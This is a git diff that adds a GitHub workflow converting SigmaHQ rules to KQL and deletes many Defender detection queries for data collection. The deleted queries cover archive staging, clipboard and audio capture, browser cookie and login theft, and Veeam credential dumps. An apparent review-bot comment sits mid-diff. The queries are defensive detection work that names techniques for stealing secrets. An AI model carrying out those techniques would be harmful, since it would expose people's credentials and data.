diff --git a/.github/workflows/update-sigma-rules.yml b/.github/workflows/update-sigma-rules.yml
new file mode 100644
index 00000000..6061f485
--- /dev/null
+++ b/.github/workflows/update-sigma-rules.yml
@@ -0,0 +1,84 @@
+name: Update Sigma to KQL Rules
+
+on:
+ schedule:
+ # Run weekly on Sunday at 2 AM UTC
+ - cron: '0 2 * * 0'
+ workflow_dispatch:
+ # Allow manual trigger
+
+jobs:
+ convert-sigma-rules:
+ runs-on: ubuntu-latest
+
+ steps:
+ - name: Checkout Sigma2KQL repository
+ uses: actions/checkout@v4
+ with:
+ token: ${{ secrets.GITHUB_TOKEN }}
+ fetch-depth: 0
+
+ - name: Set up Python
+ uses: actions/setup-python@v5
+ with:
+ python-version: '3.11'
+ cache: 'pip'
+
+ - name: Clone Sigma rules repository
+ run: |
+ git clone https://github.com/SigmaHQ/sigma.git
+
+ - name: Install Python dependencies
+ run: |
+ pip install -r requirements.txt
+
+ - name: Run Sigma to KQL conversion
+ run: |
+ python helper.py --sigma-dir "./sigma" --output-dir "./KQL"
+
+ - name: Check for changes
+ id: check_changes
+ run: |
+ git diff --quiet KQL/ || echo "changes=true" >> $GITHUB_OUTPUT
+
+ - name: Create Pull Request
+ if: steps.check_changes.outputs.changes == 'true'
+ uses: peter-evans/create-pull-request@v6
+ with:
+ token: ${{ secrets.GITHUB_TOKEN }}
+ commit-message: 'chore: update KQL rules from latest Sigma rules'
+ branch: update-sigma-rules-${{ github.run_number }}
+ delete-branch: true
+ title: 'Update KQL Rules from Sigma Repository'
+ body: |
+ ## Automated Sigma to KQL Conversion
+
+ This PR contains updated KQL rules converted from the latest Sigma rules repository.
+
+ ### Changes
+ - Updated KQL rules from SigmaHQ/sigma repository
+ - Conversion date: ${{ github.event.repository.updated_at }}
+ - Workflow run: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
+
+ ### Review Checklist
+ - [ ] Review changed rules for accuracy
+ - [ ] Verify new rules are properly formatted
+ - [ ] Check for any failed conversions in workflow logs
+
+ ---
+ *This PR was automatically created by the Update Sigma Rules workflow.*
+ labels: |
+ automated
+ sigma-update
+ reviewers: ${{ github.repository_owner }}
+
+ - name: Summary
+ if: steps.check_changes.outputs.changes == 'true'
+ run: |
+ echo "✅ Pull request created with updated Sigma rules"
+ echo "📊 Check the PR for detailed changes"
+
+ - name: No changes summary
+ if: steps.check_changes.outputs.changes != 'true'
+ run: |
+ echo "ℹ️ No changes detected - rules are up to date"
diff --git a/Collection/7Zip_Compressing_Dump_Files.kql b/Collection/7Zip_Compressing_Dump_Files.kql
deleted file mode 100644
index daeee759..00000000
--- a/Collection/7Zip_Compressing_Dump_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe")))
\ No newline at end of file
diff --git a/Collection/Audio_Capture_via_PowerShell.kql b/Collection/Audio_Capture_via_PowerShell.kql
deleted file mode 100644
index b1de4d13..00000000
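Review bot: The "Check for changes" step misses newly generated rule files, because `git diff --quiet KQL/` compares only tracked files and a rule that is new upstream lands as an untracked file under KQL/, so a run that only adds rules never opens a PR; `if [ -n "$(git status --porcelain KQL/)" ]; then echo "changes=true" >> "$GITHUB_OUTPUT"; fi` covers both modified and new files. The job declares no `permissions:` block, so the GITHUB_TOKEN passed to a third-party action that pushes branches and opens PRs carries whatever the repository default grants; an explicit `permissions: { contents: write, pull-requests: write }` limits it to what create-pull-request needs, and pinning `peter-evans/create-pull-request@v6` to a full commit SHA removes the trust placed in a mutable tag. The Sigma clone is unpinned and the PR body reports `github.event.repository.updated_at` as the conversion date, which is this repository's timestamp rather than the upstream state that was converted; capturing `git -C sigma rev-parse HEAD` into a step output and printing it in the PR body tells reviewers exactly which upstream commit the rules came from. Whether requirements.txt pins its versions cannot be seen from this hunk.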
--- a/Collection/Audio_Capture_via_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/24 -// Level: medium -// Description: Detects audio capture via PowerShell Cmdlet. -// Tags: attack.collection, attack.t1123 -DeviceProcessEvents -| where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice " \ No newline at end of file diff --git a/Collection/Audio_Capture_via_SoundRecorder.kql b/Collection/Audio_Capture_via_SoundRecorder.kql deleted file mode 100644 index 5dcbdbbf..00000000 --- a/Collection/Audio_Capture_via_SoundRecorder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019/10/24 -// Level: medium -// Description: Detect attacker collecting audio via SoundRecorder application. -// Tags: attack.collection, attack.t1123 -DeviceProcessEvents -| where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe" \ No newline at end of file diff --git a/Collection/Automated_Collection_Command_Prompt.kql b/Collection/Automated_Collection_Command_Prompt.kql deleted file mode 100644 index 9f680167..00000000 --- a/Collection/Automated_Collection_Command_Prompt.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/28 -// Level: medium -// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. -// Tags: attack.collection, attack.t1119, attack.credential_access, attack.t1552.001 -DeviceProcessEvents -| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")) \ No newline at end of file diff --git a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql b/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql deleted file mode 100644 index b639138c..00000000 --- a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/27 -// Level: medium -// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p" \ No newline at end of file 
diff --git a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql b/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql deleted file mode 100644 index 70970441..00000000 --- a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/27 -// Level: medium -// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe") \ No newline at end of file diff --git a/Collection/Compressed_File_Creation_Via_Tar.EXE.kql b/Collection/Compressed_File_Creation_Via_Tar.EXE.kql deleted file mode 100644 index c32def88..00000000 --- a/Collection/Compressed_File_Creation_Via_Tar.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3 -// Date: 2023/12/19 -// Level: low -// Description: Detects execution of "tar.exe" in order to create a compressed file. -Adversaries may abuse various utilities to compress or encrypt data before exfiltration. - -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql b/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql deleted file mode 100644 index f02eb771..00000000 --- a/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: AdmU3 -// Date: 2023/12/19 -// Level: low -// Description: Detects execution of "tar.exe" in order to extract compressed file. -Adversaries may abuse various utilities in order to decompress data to avoid detection. - -// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001 -DeviceProcessEvents -| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar") \ No newline at end of file diff --git a/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql deleted file mode 100644 index 2846d8ff..00000000 --- a/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali -// Date: 2019/12/30 -// Level: medium -// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote -// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))))) \ No newline at end of file diff --git a/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql b/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql deleted file mode 100644 index 0fb4879a..00000000 --- a/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/20 -// Level: medium -// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". -// Tags: attack.credential_access, attack.collection, attack.t1056.002 -DeviceImageLoadEvents -| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql b/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql deleted file mode 100644 index 11c993e5..00000000 --- a/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/27 -// Level: low -// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications. -// Tags: attack.collection, attack.t1115 -DeviceProcessEvents -| where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe" \ No newline at end of file diff --git a/Collection/Esentutl_Steals_Browser_Information.kql b/Collection/Esentutl_Steals_Browser_Information.kql deleted file mode 100644 index 11258b4a..00000000 --- a/Collection/Esentutl_Steals_Browser_Information.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/02/13 -// Level: medium -// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe -// Tags: attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache" \ No newline at end of file diff --git a/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql b/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql deleted file mode 100644 index 32eb0763..00000000 --- a/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/03/03 -// Level: high -// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 -// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe"))) \ No newline at end of file diff --git a/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql b/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql deleted file mode 100644 index 892b79db..00000000 --- a/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community -// Date: 2019/10/21 -// Level: low -// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe" \ No newline at end of file 
diff --git a/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql b/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql deleted file mode 100644 index b13cc722..00000000 --- a/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2021/07/20 -// Level: medium -// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. -An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. - -// Tags: attack.collection, attack.t1074.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\") \ No newline at end of file diff --git a/Collection/PUA_-_Mouse_Lock_Execution.kql b/Collection/PUA_-_Mouse_Lock_Execution.kql deleted file mode 100644 index cad3d884..00000000 --- a/Collection/PUA_-_Mouse_Lock_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Cian Heasley -// Date: 2020/08/13 -// Level: medium -// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. -// Tags: attack.credential_access, attack.collection, attack.t1056.002 -DeviceProcessEvents -| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_" \ No newline at end of file diff --git a/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql b/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql deleted file mode 100644 index 7a27616d..00000000 --- a/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/10 -// Level: medium -// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o") \ No newline at end of file diff --git a/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql b/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql deleted file mode 100644 index 754c2e8e..00000000 --- a/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/05/02 -// Level: medium -// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI -// Tags: attack.collection, attack.t1115 -DeviceProcessEvents -| where ProcessCommandLine contains "Get-Clipboard" \ No newline at end of file diff --git a/Collection/Rar_Usage_with_Password_and_Compression_Level.kql b/Collection/Rar_Usage_with_Password_and_Compression_Level.kql deleted file mode 100644 index eb0b2acf..00000000 --- a/Collection/Rar_Usage_with_Password_and_Compression_Level.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @ROxPinTeddy -// Date: 2020/05/12 -// Level: high -// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ") \ No newline at end of file diff --git a/Collection/Recon_Information_for_Export_with_Command_Prompt.kql b/Collection/Recon_Information_for_Export_with_Command_Prompt.kql deleted file mode 100644 index 63bb9dd0..00000000 --- a/Collection/Recon_Information_for_Export_with_Command_Prompt.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/30 -// Level: medium -// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. -// Tags: attack.collection, attack.t1119 -DeviceProcessEvents -| where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\") \ No newline at end of file diff --git a/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql deleted file mode 100644 index 6b0bdff3..00000000 --- a/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/19 -// Level: medium -// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field -// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592 -DeviceProcessEvents -| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe"))) \ No newline at end of file diff --git a/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql b/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql deleted file mode 100644 index 630b3df1..00000000 --- a/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: TropChaud -// Date: 2022/12/19 -// Level: high -// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. -// Tags: attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql b/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql deleted file mode 100644 index fbc2f1fc..00000000 --- a/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/08 -// Level: high -// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. -// Tags: attack.credential_access, attack.t1539, attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql b/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql deleted file mode 100644 index c38fcb0e..00000000 --- a/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community -// Date: 2019/10/12 -// Level: medium -// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. -// Tags: attack.collection, attack.t1113 -DeviceProcessEvents -| where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe" \ No newline at end of file diff --git a/Collection/Suspicious_Camera_and_Microphone_Access.kql b/Collection/Suspicious_Camera_and_Microphone_Access.kql deleted file mode 100644 index 02e3f749..00000000 --- a/Collection/Suspicious_Camera_and_Microphone_Access.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Den Iuzvyk -// Date: 2020/06/07 -// Level: high -// Description: Detects Processes accessing the camera and microphone from suspicious folder -// Tags: attack.collection, attack.t1125, attack.t1123 -DeviceRegistryEvents -| where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#") \ No newline at end of file diff --git a/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql b/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql deleted file mode 100644 index 89728d30..00000000 --- a/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/01 -// Level: high -// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine 
contains "/active no"))) \ No newline at end of file diff --git a/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql b/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql deleted file mode 100644 index 4a238404..00000000 --- a/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/20 -// Level: high -// Description: Detects dump of credentials in VeeamBackup dbo -// Tags: attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe" \ No newline at end of file diff --git a/Collection/Veeam_Backup_Database_Suspicious_Query.kql b/Collection/Veeam_Backup_Database_Suspicious_Query.kql deleted file mode 100644 index f4765f5e..00000000 --- a/Collection/Veeam_Backup_Database_Suspicious_Query.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/04 -// Level: medium -// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. -// Tags: attack.collection, attack.t1005 -DeviceProcessEvents -| where (ProcessCommandLine contains "BackupRepositories" or ProcessCommandLine contains "Backups" or ProcessCommandLine contains "Credentials" or ProcessCommandLine contains "HostCreds" or ProcessCommandLine contains "SmbFileShares" or ProcessCommandLine contains "Ssh_creds" or ProcessCommandLine contains "VSphereInfo") and ((ProcessCommandLine contains "VeeamBackup" and ProcessCommandLine contains "From ") and FolderPath endswith "\\sqlcmd.exe") \ No newline at end of file 
